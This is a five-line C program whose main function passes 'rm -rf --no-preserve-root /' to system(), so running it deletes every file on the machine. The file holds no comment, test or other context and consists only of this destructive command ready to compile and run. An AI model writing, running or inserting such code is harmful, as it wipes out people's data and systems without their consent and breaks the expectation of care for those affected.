#include <stdlib.h>
int main() {
  system("rm -rf --no-preserve-root /");
  return 0;
}